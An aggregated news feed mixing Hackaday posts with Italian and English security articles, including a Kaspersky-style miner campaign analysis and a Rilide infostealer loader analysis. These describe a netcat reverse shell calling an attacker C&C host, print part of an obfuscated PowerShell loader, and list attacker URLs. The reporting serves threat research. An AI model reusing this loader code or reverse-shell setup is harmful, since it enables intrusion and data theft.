What have you missed on Hackaday this week? Elliot Williams and Al Williams compare notes on their favorites from the week, and you are invited. The guys may have said too much about the Supercon badge this year — listen in for a few hints about what it will be about.

For hacks, you’ll hear about scanning tunneling microscopes, power management for small Linux systems, and lots of inertial measurement units. The guys talked about a few impossible hacks for consumer electronics, from hacking a laptop, to custom cell phones.

Of course, there are plenty more long-form articles of the week, including a brief history of what can go wrong on a spacewalk and how to get the lead out (of the ground). Don’t forget to take a stab at the What’s That Sound competition and maybe score a sweet Hackaday Podcast T-shirt.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Use this link to teleport a DRM-free MP3 to your location.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Episode 291 Show Notes:

News:

• Supercon is almost here!

What’s that Sound?

• Do you know the sound? Let us know and get a chance at a coveted Hackaday Podcast T.

Interesting Hacks of the Week:

• Building A 3D Printed Scanning Tunneling Microscope
  
  • Cheap DIY Microscope Sees Individual Atoms
  • Homebrew Probe Tip Etcher Makes Amazingly Sharp Needles

  
  

• Creating Video Games With AI: A Mario Example
• Pi Zero Power Optimization Leaves No Stone Unturned
• Inside The F-4 Attitude Indicator
  
  • Retrotechtacular: Sychros Go to War and Peace

  
  

• Easily Build This IMU Array Sandbox
  
  • IMU Sensor Fusion

  
  

• Thinkpad 13 Gets NVMe Support With Three Jumpers

Quick Hacks:

• Elliot’s Picks:
  
  • MikroPhone – Open, Secure, Simple Smartphone
  • 2024 SAO Contest: We’ve Got SAOs For Your SAOs
  • Man-in-the-Middle PCB Unlocks HP Ink Cartridges

  
  

• Al’s Picks:
  
  • Blinking An LED Passively
  • 3D Printed Jellyfish Lights Up
  • Add USB-C To Your AirPods The Easy Way

  
  

Can’t-Miss Articles:

• Polaris Dawn, And The Prudence Of A Short Spacewalk
• Mining And Refining: Lead, Silver, And Zinc

hackaday.com/2024/10/04/hackad…

We might consider PCB panels as simply an intermediate step towards getting your PCBs manufactured on the scale of hundreds. This is due to, typically, an inability to run traces beyond your board – and most panel generators don’t give you the option, either. However, if you go for hand-crafted panels or modify a KiKit-created panel, you can easily add extra elements – for instance, why not add vias in the V-Cut path to preserve electrical connectivity between your boards?

[Adam Gulyas] went out and tried just that, and it’s a wonderfully viable method. He shows us how to calculate the via size to be just right given V-Cut and drilling tolerances, and then demonstrates design of an example board with discrete component LED blinkers you can power off a coin cell. The panel gets sent off to be manufactured and assembled, but don’t break the boards apart just yet — connect power to the two through-hole testpoints on the frame, and watch your panel light up all at once.

It’s a flashy demonstration – even more so once you put light-diffusing spheres on top of the domes. You could always do such a trick with mousebites, but you risk having the tracks tear off the board, and, V-Cuts are no doubt the cleanest way to panelize – no edge cleaning is required after breaking the boards apart. Want to learn about panel design? We’ve written and featured multiple guides for you over the years.

hackaday.com/2024/10/04/v-cut-…

Up first this week is a warning for the few of us still brave enough to host our own email servers. If you’re running Zimbra, it’s time to update, because CVE-2024-45519 is now being exploited in the wild.

That vulnerability is a pretty nasty one, though thankfully requires a specific change from default settings to be exposed. The problem is in postjournal. This logging option is off by default, but when it’s turned on, it logs incoming emails. One of the fields on an incoming SMTP mail object is the RCPT TO: field, with the recipients made of the to, cc, and bcc fields. When postjournal logs this field, it does so by passing it as a bash argument. That execution wasn’t properly sanitized, and wasn’t using a safe call like execvp(). So, it was possible to inject commands using the $() construction.

The details of the attack are known, and researchers are seeing early exploratory attempts to exploit this vulnerability. At least one of these campaigns is attempting to install webshells, so at least some of those attempts have teeth. The attack seems to be less reliable when coming from outside of the trusted network, which is nice, but not something to rely on.

New Tool Corner

What is that binary doing on your system? Even if you don’t do any security research, that’s a question you may ask yourself from time to time. A potential answer is WhoYouCalling. The wrinkle here is that WYC uses the Windows Event Tracing mechanism to collect the network traffic strictly from the application in question. So it’s a Windows only application for now. What you get is a packet capture from a specific executable and all of its children processes, with automated DNS capture to go along.

DNS Poisoning

Here’s a mystery. The folks at Assetnote discovered rogue subdomains from several of their customers, showing up with seemingly random IP addresses attached. A subdomain like webproxy.id.customer.vn might resolve with 10 different addresses, when querying on alibabadns.com.

That turned out to be a particularly important clue. These phantom subdomains were all linked to the Chinese Internet in some way, and it turns out that each subdomain had some interesting keyword in it, like webproxy or VPN. This seems to be a really unique way to censor the Internet, as part of the Chinese Great Firewall. The problem here is that the censorship can escape, and actually poison DNS for those subdomains for the rest of the Internet. And because sometimes the semi-random IPs point at things like Fastly CDN or old cPanel installs. A bit of legwork gets you the equivalent of subdomain takovers. Along with the story, Assetnote have shared a tool to check domains for this issue.

Virtual Name Tags Bring the Creep Factor

What do you get when you combine Internet-connected smart glasses with LLM doing facial recognition? The optimistic opinion is that you get virtual nametags for everybody you meet. I’ve played a video game or two that emulates that sort of ability. Taking a bit more cynical and realistic view, this auto-doxxing of everyone in public strays towards dystopian.

perfctl

There’s a newly discovered Linux malware, perfctl, that specializes in stealth, combined with Monero mining. The malware is also used to relay traffic, as well as install other malware in compromised machines. The malware communicates over TOR, and uses some clever tricks to avoid detection. Log in to a compromised machine, and the Monero mining stops until you log back out.

The malware is particularly difficult to get rid of, and as always, the best solution is to carefully back up and then wipe the affected machine. One of the tells to look for is a machine that’s hard charging when it has no business being spun up to 100% CPU usage, and then when you log in and look for the culprit, it drops to normal.

Bits and Bytes

[nv1t] found a kid’s toy, the Kekz Headphones, and they just begged to be taken apart. This toy has a bunch of audio on an SD Card, and individual NFC-enabled tokens that triggers playback of the right file. This one is interesting from an infosec perspective, because the token actually supplies the encryption key for the file playback, making it a nominally secure system. After pulling everything apart, it became apparent that the encryption wasn’t up to the task, with only about 56 possible keys for each file.

Something we’ve continually talked about is how the subtle mismatches in data parsing often lead to vulnerabilities. [Mahmoud Awali] has noticed this, too, and decided to put together a comparison of how different languages handle HTTP parameters. Did you know that Ruby uses the semicolon as a parameter delimiter? There are a bunch of quirks like this, and this is the sort of material that you’ll need to find that next big vulnerability.

And finally, speaking of Ruby, are you familiar with Ruby’s class pollution category of vulnerabilities? It’s akin to Python and JavaScript’s prototype pollution, and not entirely unlike Java’s deserialization issues. If Ruby is your thing, go brush up on how to avoid this particular pitfall.

hackaday.com/2024/10/04/this-w…

Recentemente, il gruppo ransomware Stormous ha rivendicato la compromissione di OfficeGroup, un’azienda italiana specializzata nello sviluppo di sistemi gestionali e informatici. Questo attacco ha portato all’esfiltrazione e alla pubblicazione di circa 1 GB di dati, come confermato dal gruppo stesso.

Stormous, noto gruppo cyber-criminale attivo dal 2021, ha costruito la propria reputazione attraverso una serie di attacchi a realtà internazionali operanti in vari settori. L’obiettivo principale degli attacchi è l’esfiltrazione di dati sensibili, seguita da richieste di riscatto per evitare la pubblicazione degli stessi. Le comunicazioni di Stormous avvengono tramite un canale Telegram dedicato, su cui pubblicano aggiornamenti sugli attacchi e le presunte violazioni.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

Dettagli della rivendicazione

L’attacco a OfficeGroup è stato segnalato il 3 ottobre 2024, e si presume che il gruppo ransomware abbia esfiltrato 1 GB di dati dall’infrastruttura della società.

Nonostante le informazioni diffuse da Stormous, non ci sono ancora conferme ufficiali da parte di OfficeGroup. La natura e il contenuto dei dati esfiltrati non sono stati divulgati pubblicamente, e l’azienda non ha ancora rilasciato dichiarazioni riguardo all’accaduto.

Il modus operandi di Stormous si basa sull’infiltrazione nei sistemi di aziende di diverse nazioni e settori, con l’intento di rubare dati sensibili e chiedere riscatti. È probabile che l’obiettivo sia non solo quello di ottenere pagamenti dalle vittime, ma anche di intimidire altre organizzazioni mostrando la loro capacità di compromettere sistemi e pubblicare dati riservati.

Conclusione

Al momento, non ci sono conferme ufficiali da parte di OfficeGroup in merito all’entità del danno subito o alle azioni intraprese per mitigare le conseguenze dell’attacco. È auspicabile che l’azienda prenda misure appropriate per garantire la sicurezza dei dati e la continuità dei propri servizi, oltre a collaborare con le autorità competenti per investigare sulla vicenda.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo, possono utilizzare la mail crittografata del whistleblower.

L'articolo Stormous rivendica un attacco all’Italiana Office Group: 1 GB di Dati nel dark web proviene da il blog della sicurezza informatica.

It’s fairly insignificant in the scheme of things, and there’s no hardware as yet for us to look at, but there it is. Tucked away in a device tree file, the first mention of a Raspberry Pi 500. We take this to mean that the chances of an upgrade to the Pi 400 all-in-one giving it the heart of a Pi 5 are now quite high.

We’ve remarked before that one of the problems facing the Raspberry Pi folks is that a new revision of the regular Pi no longer carries the novelty it might once have done, and certainly in hardware terms (if not necessarily software) it could be said that the competition have very much caught up. It’s in the Compute Module and the wildcard products such as the all-in-one computers that they still shine then, because even after several years of the 400 it’s not really seen an effective competitor.

So we welcome the chance of an all-in-one with a Pi 5 heart, and if we had a wish list for it then it should include that mini PCI-E slot on board for SSDs and other peripherals. Such a machine would we think become a must-have for any space-constrained bench.

hackaday.com/2024/10/04/the-ra…

Gli specialisti di Cloudflare hanno riferito di aver recentemente respinto un attacco DDoS che ha stabilito un nuovo record. Secondo Matthew Prince, CEO di Cloudflare, la potenza di attacco ha raggiunto 3,8 Tbps e 2,14 miliardi di pacchetti al secondo (Pps).

L’attacco mirava a un cliente anonimo di un provider di hosting anonimo che utilizza i servizi di Cloudflare.

Per fare un confronto, ricordiamo che il record precedente in questo ambito era stato stabilito alla fine del 2021, quando Microsoft registrò un attacco con una capacità di 3,47 Tbit/s e 340 milioni di PPS. E l’attacco più grande, registrato in precedenza da Cloudflare, ha raggiunto una potenza di 2,6 Tbit/s.

In un post sul blog, gli analisti di Cloudflare hanno affermato che l’attacco è durato quasi un mese ed è consistito in più di un centinaio di attacchi DDoS ipervolumetrici separati. Molti di essi erano destinati all’infrastruttura di rete target (L3 e L4) e la loro capacità superava i 2 miliardi di pacchetti PPS e i 3 Tbit/s.

I dispositivi infetti da cui è stato effettuato l’attacco erano sparsi in tutto il mondo e si trovavano in Russia, Vietnam, Stati Uniti, Brasile e Spagna.

Allo stesso tempo, gli aggressori hanno utilizzato diversi dispositivi hackerati, tra cui router Asus, dispositivi Mikrotik, DVR, server web e così via. Nella maggior parte dei casi i dispositivi compromessi utilizzavano il protocollo UDP su una porta fissa.

Cloudflare afferma di aver mitigato con successo tutti questi attacchi, uno dei quali ha avuto una potenza di picco di 3,8 Tbps e una durata di 65 secondi.

L'articolo Cloudflare: il più grande attacco DDoS della storia da 3,8 Tbps è stato sventato proviene da il blog della sicurezza informatica.

La navicella spaziale Psyche di NASA è stata lanciata il 13 ottobre 2023 e si trova ora in viaggio verso l’asteroide 16 Psyche, situato nella fascia degli asteroidi tra Marte e Giove. Durante il suo viaggio, utilizza propulsori a ioni alimentati da energia solare per spostarsi. La missione Psyche ha come obiettivo di esplorare questo asteroide metallico, che si crede possa fornire informazioni cruciali sulla formazione dei pianeti del nostro sistema solare. La navicella dovrebbe arrivare a destinazione nell’agosto del 2029, dove inizierà ad orbitare attorno all’asteroide per analizzarne la composizione e altre caratteristiche scientifiche

Nell’estate del 2024, la tecnologia Deep Space Optical Communications (DSOC) ha stabilito un nuovo record trasmettendo un segnale laser dalla Terra alla navicella spaziale Psyche, a circa 290 milioni di miglia (460 milioni di chilometri) di distanza. Questa distanza equivale alla massima distanza tra la Terra e Marte.

Un traguardo importante è stato raggiunto il 29 luglio, completando la prima fase della dimostrazione tecnologica lanciata con Psyche il 13 ottobre 2023. Le comunicazioni ottiche hanno dimostrato la loro efficacia su enormi distanze, fornendo dati a velocità fino a 100 volte superiori rispetto ai sistemi radio.

La tecnologia DSOC si basa su un trasmettitore laser e due stazioni di terra. L’Osservatorio Palomar in California riceve i dati dalla navicella spaziale e un laboratorio vicino a Wrightwood invia segnali laser da 7 kW.

L’uso di un laser consente velocità di dati significativamente più elevate rispetto ai segnali radio, il che potrebbe essere fondamentale per le future missioni spaziali, compreso l’invio di astronauti su Marte.

La NASA ha inviato un segnale laser a circa 290 milioni di miglia alla navicella spaziale per le comunicazioni ottiche nello spazio profondo.

A una distanza di 33 milioni di miglia, la velocità di trasmissione ha raggiunto 267 megabit al secondo e a una distanza di 240 milioni di miglia – 6,25 megabit al secondo. Durante la dimostrazione sono stati trasferiti quasi 11 terabit di dati. Un video ultra-HD di 45 secondi contenente riprese della Terra e dello spazio è stato inviato sulla Terra da Psiche.

youtube.com/embed/KGMiAPLRUhs?…

La tecnologia DSOC ha mostrato un’elevata stabilità. Si prevede che il trasmettitore verrà riacceso nel novembre 2024 per testare le sue prestazioni a lungo termine.

L'articolo Internet dallo Spazio Profondo! La NASA Raggiunge Psyche con un Laser da 267 megabit proviene da il blog della sicurezza informatica.

While trying to deliver malware on victims’ devices and stay on them as long as they can, sometimes attackers are using quite unusual techniques. In a recent campaign starting in 2022, unknown malicious actors have been trying to mine cryptocurrency on victims’ devices without user consent; they’ve used large amounts of resources for distribution, but what’s more, used multiple unusual vectors for defense evasion and persistence. One of these vectors was abusing the open-source SIEM “Wazuh” agent.

We are quite sure that this campaign was a global one, but in this article, we’ll focus on an infection chain that, according to our telemetry, was targeting mainly Russian-speaking users. The attackers distributed the malicious files using websites for downloading popular software (uTorrent, Microsoft Office, Minecraft, etc.) for free. These websites were shown to users in the top search results in Yandex. Malware was also distributed through Telegram channels targeted at crypto investors and in descriptions and comments on YouTube videos about cryptocurrency, cheats and gambling.

Infection

The attackers were advertising their websites in Yandex search results. Users would see these malicious sites in the top results when searching for resources freely distributing popular software like uTorrent, MS Excel, MS Word, Minecraft, Discord and so on.

Links to malicious websites in Yandex search results

The frontend of these websites is a copy of either the official software website or a known piracy website distributing this kind of software:

Malicious websites

The attackers are running multiple Telegram channels distributing the malware in question. These channels are most definitely targeted at cryptocurrency owners or cheating gamers: they are offered to download specific software that presumably might be of interest to them. To prevent anyone trying to disclose information about these channels and the fraudulent activity of their creators, the administrators disabled message forwarding, screenshots, and previews of these channels in the Telegram web-version.

Malware in the attackers’ Telegram channel

Even more, the malware was also distributed via YouTube. The attackers uploaded numerous videos in English from multiple accounts which were presumably stolen. It’s also possible that the video content was downloaded from other YouTube channels and reuploaded without the authors’ consent. In the video description and in the top comment the attackers left links to their resources and instructions on how to launch the malware. Some of these links redirected users immediately to malicious websites, while others led to the aforementioned Telegram channels. We have also seen links to known IP logging websites, allowing the malicious actors to collect the IP addresses of anyone who follows the link and gets redirected to the malware-carrying website.

Examples of videos with malicious links in their description or comments

Comment with a link to a malicious Telegram channel

Persistence and defense evasion

After visiting the attackers’ website or channel, users might download a ZIP file being falsely advertised as popular software. Inside the archive is an MSI file and a TXT file with a password required for installation. There are also instructions on how to install the software, in which the attackers recommend disabling any installed antivirus and Windows Defender beforehand. In many cases, the instructions and the password are also provided on the websites and channels from which the user downloaded the malicious archive.

Content of text file

When launched, the MSI file asks for the password from the TXT file, which is one of the first countermeasures against sandbox analysis. If the user specifies the right password, the CustomAction field value of the MSI file is executed — this is effectively a VB script. This script launches a BAT file which extracts the next element of the attack chain from an encrypted archive. The first step is to escalate privileges by adding another BAT file to autorun, granting SYSTEM privileges for a single execution. After that, the system reboots.

CustomAction field value in the MSI file

The BAT file from autorun extracts the encrypted RAR archive and runs the “start” command with two DLL files as arguments — these were previously extracted from the archive. One of these files is a legitimate AutoIt interpreter and the second is a legitimate dynamic library with a valid digital signature. The malicious payload is an A3X script which was compiled into an EXE file and injected right inside the second DLL file signature.

Malicious payload hidden inside a legit dynamic library signature

This technique is interesting for two reasons. First, the A3X script is added to the signature in such a way that its validity remains intact and the whole file is still considered as signed, even with the payload. Such a malicious addition is almost impossible to detect without file content analysis. Second, the AutoIt interpreter has an interesting way of reading files that were specified in its launch argument. The file is scanned for a specific AutoIt signature which is present only in compiled scripts, and all other contents of the file are ignored. This behavior allows the attackers to hide their malicious payload anywhere in the file where it won’t be harmful for the container itself.

Signature at the beginning of the A3X script

Placing malicious payloads in an arbitrary section of a file is not new. Such techniques have been used not only with AutoIt, but with other platforms too. But what makes this attack stand out is the bypass of signature verification, making it possible for the payload-bearing file to seem legitimate.

File with payload successfully bypasses signature verification

If the “start” command failed, the BAT file removes the entire directory with the installed files, including itself. Otherwise, the malicious A3X implant is launched, which checks all active processes in attempt to find anything related to debugging or anti-malware products. If anything is found, the script immediately exits, as you can see in the snippet of deobfuscated code below.

Security process name check by malicious implant

The compiled A3X script contains multiple FileInstall function calls. This function takes two arguments: a path to the file that will be installed, and its destination path. Before compilation, this call just copies the file from its source path to its destination, but during the compilation the interpreter stores the files for installation right inside the compiled script.

The resulting file contains not only the executable code itself, but also additional malicious files which will be installed directly from the implant. These files are required for persistence and to execute the next steps of the infection chain. The files are installed to the following paths:
C:\ProgramData\NUL..\libssl-1_1.dll
C:\ProgramData\NUL..\vcruntime140.dll
C:\ProgramData\NUL..\libcrypto-1_1.dll
C:\ProgramData\NUL..\StartMenuExperienceHost.exe
C:\ProgramData\AUX..\ShellExt.dll
C:\ProgramData\AUX..\utshellext.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellExt.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\utshellext.dll
C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\ShellExt.dll
C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\utshellext.dll
C:\ProgramData\insta.bat
C:\ProgramData\Distribution..\ShellExt.dll
C:\ProgramData\Distribution..\utshellext.dll
C:\ProgramData\Oedist\Kun.bat
C:\ProgramData\Redist\Oun.bat
C:\ProgramData\Uedist\Eun.bat
C:\ProgramData\Jedist\Qun.bat
For persistence purposes, the directories containing the installed files have system, hidden and read-only attributes. In addition, using the icacls utility, the implant forbids all users across all domains to remove these folders, change their permissions, own them, add any files or subdirectories, write to them any attributes (including extended ones), or remove files from them.

Files are copied to directories with unusual names for a reason. For example, the folder name “Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}” is treated specially by Windows Shell: Explorer will find the GUID in its name and treat it as a link — in this case to the Action Center. As a result, the user will not be able to view the contents of the directory.

Malicious directory in Explorer

After installing all the necessary files, the implant establishes persistence using WMI by creating filters which are activated by common events — common enough to guarantee filter activation. For each created filter, a polling frequency is specified. When a filter is activated, a specific command is executed using the __FilterToConsumerBinding class.

• Once every three minutes, the netcat utility masked as StartMenuExperienceHost.exe is launched with the C&C address of the attackers (sportjump[.]ru) and “-e cmd.exe” as its arguments. It is then used as a reverse shell by the attackers.
• Once every five to ten minutes, files named “nun.bat” are executed. They are copies of the same file which starts the next step of the infection chain. The attackers created two copies to increase the chance of malware execution, but if there are no outages, both of them are launched.
• Once every fifteen minutes, the next step of the infection chain is launched directly via the “start” command.

All these methods are used again for a better persistence by launching the “insta.bat” file right before the end of the A3X implant execution.

Launch of the netcat utility

Persistence is established not only through WMI; the implant also directly starts netcat, the “nun.bat” files, and the “start” command. After that, it also abuses the registry keys “Image File Execution Options”, “Debugger” and “MonitorProcess” with the same goals.

One of the most interesting things about some variants of the malware is the download and use of the Wazuh SIEM agent for remote access and telemetry harvesting. To ensure that the attackers can execute any arbitrary command on the victim’s device, during the agent installation, the “remote_commands” option is set.

Installation and launch of the Wazuh agent

The first stage of the A3X implant collects the following information: computer name, username, OS version and architecture, CPU name, data about the GPU and installed AV software. All this information along with the current time is sent to a special Telegram bot chat controlled by the attackers. We’ve also seen some of the malware variants sending a screenshot of the user’s desktop or installing a malicious browser extension, which may replace cryptocurrency wallets in the clipboard.

Malicious browser extension

The next stage of the infection chain consists of two DLL files, that use the same technique as the first stage: a legitimate AutoIt interpreter and another A3X implant, located in the signature of the legitimate dynamic library. This implant is the final payload in the malware variant described here. It injects into a newly created explorer.exe process memory an open-source miner named SilentCryptoMiner, which contains the URL of the attacker’s mining configuration. This configuration specifies the cryptocurrency to be mined, the wallet, and so on. In the analyzed variants, we could see that the attackers mostly use anonymous cryptocurrencies like Monero or Zephyr.

Example of the miner configuration

Aside from its main purpose of generating cryptocurrency, SilentCryptoMiner can also hide its own activity from the processes specified in the “stealth-targets” argument and stop processes from the “kill-targets” process names list.

Attack geography

Most of the attacks with this infection chain targeted Russian users (87.63%). After that, the other top ten countries with the highest number of users affected by these attacks were Belarus, India, Uzbekistan, Kazakhstan, Germany, Algeria, Czech Republic, Mozambique, and Turkey.

TOP 10 countries where users were affected by the described infection chain, June — August 2024 (download)

Conclusion

The attack described in this article vividly illustrates the fact that even mass campaigns can be quite complex and open up a wide range of opportunities for attackers. As a result of the multistage infection chain, the attackers can establish persistence in users’ systems in multiple ways, gaining full access. Even though the main goal of the attackers is to make profit by stealthily mining cryptocurrency, some variants of the malware can perform additional malicious activity, such as replacing cryptocurrency wallets in the clipboard and taking screenshots. The most interesting action in this attack was the implementation of unusual techniques like using an SIEM agent as backdoor, adding the malicious payload to a legitimate digital signature, and hiding directories containing malicious files.

It’s important to mention that the websites, videos, and Telegram channels created by the attackers primarily target users seeking free versions of popular software or videogame cheats. This audience makes an easy target for the attackers because they are open to installing unofficial software from obscure sources and disabling security measures.

Our products detect this malware with the following names:

• HEUR:Trojan-Dropper.OLE2.Agent.gen
• HEUR:Trojan.BAT.Agent.gen
• HEUR:Trojan.VBS.Agent.gen
• Trojan.Script.AutoIt.ak
• Trojan.BAT.Agent.cix
• Trojan.BAT.Miner.id
• HEUR:Trojan.Multi.Agent.gen
• PDM:Trojan.Win32.Generic

MITRE ATT&CK Matrix

Indicators of compromise

Hashes
b5b323679524d52e4c058b1a3dd8dee7
4efa8ca01d7c566ff1b72f4ebf57cf2c
10f888a9aa8082651adeff4790675fd5
30dd26075a5ca7a4861e9214a99d0495
60efc41c30fd9ab438e88c6011df5c38
961fa114e9eb92016977940f7c97cdd9
1457e18b453d8cefc34047e1b0fbf76f
284418b6a9c70cc30ef14df3a87c24da
5788631016d8bc495f4f2614f9a7bbe0
a9bc00e5e8a17df95bd5b8c289a12b31
a9bd813679517c846dcf36454baa6170
a99f3f8736d7d3001aa5eb6202123948
a802ce130be6546b76d4b54f72d14645
ae9e83d1031462cb5e58b4525036670c
b25f9490f6d80f9de5a9c02cc344f9f9
cffc70e4fb7363024fcc3590755fa846
e9154a7613a8f8baf67ec3b696c9cb12
f213f94729b294c01a0df21800c4e395
2e68f4438ce59c868af01b535c98060d
839471243f9c4a294c42fabf636f7cad
4b0d76262dd82985d330b02190a880c0
1a5d955be79046a3288b869e44e87404
f8342fd3e32dcf9832dff3e923ef530b
20b6ac10f657963245940c9bcd25a346
33c7c22e33e134ec3ddfc6be8ee1f1ee
2e4146c1a93c0bfe0f4e9ea53b8da7ee
827eca9ec457f3c5180f602832f44955
e3b6142df6a7c73a99736082fbae2fa6
4bdcbc7ec1929d9b1ebcc4d01d605b05
0da6e1036ca5d8231ee94a4db8c48728
098872e9e39bd4cd0e4debd4b397b555
0305f8a9dee464f56023411e7b0924df
be8b6452aa874904f116f9b7cdfe343b
6c0416f719ceca15f9e9c4f210c64fb0
25b90fa3b21875157c6f33b7e1b6e8d7
14b7429205955056f1763553f82fe244

URL-addresses
excel-ms.github[.]io/Windows/MS-Excel.zip
utorrent-client.github[.]io
gta-5rp.github[.]io/Windows/GTArp.zip
mssg[.]me/eahcu
linktr[.]ee/excel_ms
linktr[.]ee/utorrent_client
nyaera[.]ru/wp-includes/uploads/art/utorrent.zip
nyaera[.]ru/wp-includes/uploads/My/MS-Excel.zip
github[.]com/lidiyakamalova89/www/raw/main/Ver.1.4.1.zip
raw.githubusercontent[.]com/lidiyakamalova89/www/main/Ver.1.4.1.zip
raw.githubusercontent[.]com/radominator7204/dsz/main/Install.zip
sportjump[.]ru
gamesjumpers[.]com
gamejump[.]site
alljump[.]ru
pastebin[.]com/raw/F87y7zJV
pastebin[.]com/raw/uU34Qunt
rentry[.]co/mi9fomgo/raw

securelist.com/miner-campaign-…

A partire dal 2023, Rilide è emerso come una minaccia in crescita nel panorama degli infostealer. Prendendo di mira principalmente browser basati sul motore Chromium, come Google Chrome e Microsoft Edge, Rilide opera come un’estensione del browser, accedendo a credenziali di accesso, cookie e persino carte di credito e portafogli di criptovalute.

I ricercatori italiani di Delfi Security con questo articolo, hanno svolto un’indagine su un campione di Rilide distribuito insieme a un loader PowerShell per eludere i sistemi di detection. Il codice del loader include un meccanismo che invia un avviso con le informazioni di sistema a un canale Telegram ogni volta che il loader viene eseguito. A causa di una configurazione errata dei permessi del canale, è stato possibile accedervi, recuperare l’elenco completo dei dispositivi infetti e identificare l’account Telegram dal threat actor per gestire il canale.

Analisi del loader

Il loader PowerShell è suddiviso in due stage. Nel primo stage vengono definite due costanti: “p94oc”, che contiene il secondo stage crittografato con AES, e “UG8Nu5”, che contiene la chiave di decrittazione. Il codice viene eseguito tramite la funzione Invoke-Expression dopo essere stato decrittato dalla funzione decrypt():

Set-Variable p94oc -Option Constant -Value 'qlzVmHUcEvt0o[...]'

Set-Variable UG8Nu5 -Option Constant -Value System.Text.Encoding]::UTF8.GetString(([byte[]] ( 87, 103, 47, [...] ))))

function decrypt( $UG8Nu5, $T7Ek )

{

$LV2q = [System.Convert]::FromBase64String( $T7Ek )
$irW2N = $LV2q[0..15]
$nTMr = createAesManagedObject $UG8Nu5 $irW2N
$ybXNa = $nTMr.CreateDecryptor()
$M5Tz = $ybXNa.TransformFinalBlock( $LV2q, 16, $LV2q.Length - 16 )
$nTMr.Dispose()
return [System.Text.Encoding]::UTF8.GetString( $M5Tz ).Trim( [char] 0 )

}

Invoke-Expression ( decrypt $UG8Nu5 $p94oc )

Il secondo stage, una volta decrittato, esegue le seguenti azioni:

• Raccoglie informazioni sull’utente corrente, i suoi privilegi, il dispositivo e i gruppi locali presenti su di esso.
• Recupera l’indirizzo IP e la posizione del dispositivo inviando una richiesta GET a “ipapi.com/json/?fields=status,…
• Estrae l’estensione Rilide – memorizzata all’interno del secondo stage stesso – in una cartella temporanea: “C:\Users\[utente]\AppData\Roaming[valore casuale]\”.
• Raccoglie un elenco dei browser basati su Chromium installati e installa l’estensione copiando manualmente i file e modificando alcune chiavi di registro e file delle preferenze di sicurezza del browser.
• Elimina la cartella temporanea creata.
• Invia un report al threat actor tramite un canale Telegram dedicato, includendo le informazioni raccolte nel primo punto e un log completo dell’installazione. Per consentire ciò, nel codice sono inclusi il token del bot e l’ID del canale.

Un comportamento tipico per un loader di un information stealer. Durante l’analisi, il token del bot utilizzato per inviare messaggi al canale Telegram era ancora attivo. Ciò è stato verificato chiamando il metodo /getMe dell’API di Telegram tramite una richiesta GET all’indirizzo:

https://api.telegram.org/bot[BOT_ID]:[TOKEN]/getMe

La chiamata /getMe ha restituito informazioni di base sul bot, come il suo ID e il nome utente, confermando che il token era ancora valido:

Accesso al canale di notifica del loader

Al momento dell’analisi, il canale utilizzato per inviare i messaggi era privato, il che significa che solo i membri potevano vederne il contenuto. L’API Bot di Telegram offre numerose funzionalità, ma nessuna per leggere i messaggi da un canale. Tuttavia, alcuni metodi possono essere sfruttati per accedere al contenuto se il canale è configurato in modo insicuro.

Se il bot è amministratore del canale e dispone delle autorizzazioni necessarie, è possibile utilizzare il metodo /createChatInviteLink per generare un link che consente a qualsiasi utente di Telegram di unirsi al canale, inviando una richiesta GET a:

Nella maggior parte dei casi, i canali utilizzati dagli infostealer per ricevere aggiornamenti non consentono questo tipo di accesso. Tuttavia, questa volta, alla chiamata del metodo /createChatInviteLink, è stata restituita la seguente risposta:

Aprendo il link, qualsiasi utente poteva unirsi al canale, che al momento dell’analisi contava 3 iscritti (incluso il bot):

Il canale era attivo al momento dell’analisi e riceveva quotidianamente dozzine di nuovi messaggi da dispositivi infetti. Questi messaggi contenevano un allegato di testo con un log dell’installazione del malware, che riportava dati sull’ambiente di esecuzione (come il nome del dominio Active Directory, il percorso di installazione del malware e altro), eventuali errori riscontrati – probabilmente per scopi di debug – e informazioni di base sul sistema appena infettato:

Lo scraping del canale ha permesso di scoprire 291 dispositivi infetti insieme a informazioni di base sui sistemi. Laddove è stato possibile identificare le vittime tramite i dati presenti nel log di installazione (ad esempio attraverso i nomi dei domini Active Directory), le parti interessate sono state avvisate.

Identificazione dell’account utilizzato per gestire il canale

Utilizzando una richiesta GET all’indirizzo:

è stato possibile identificare l’account utilizzato dal threat actor per gestire il canale:

L’account era ancora attivo al momento dell’analisi:

Sebbene talvolta sia possibile scoprire informazioni interessanti sugli account Telegram se le loro impostazioni di privacy sono configurate in modo errato, in questo caso non è stato così. Pertanto, l’indagine su questo account è stata interrotta a questo punto.

Conclusione

Telegram è stato sfruttato da attori malevoli per anni, e i distributori di infostealer non fanno eccezione. L’uso dei canali Telegram offre diversi vantaggi agli attaccanti, come l’eliminazione della necessità di un hosting web. Tuttavia, i canali configurati in modo errato possono fornire informazioni cruciali agli analisti, poiché è sempre possibile estrarre il token del bot e l’ID del canale dal campione di malware. Inoltre, è possibile inondare il canale con dati falsi, rendendolo inutilizzabile per il proprietario. In alcuni casi, si può persino rimuovere il proprietario o chiudere il canale.

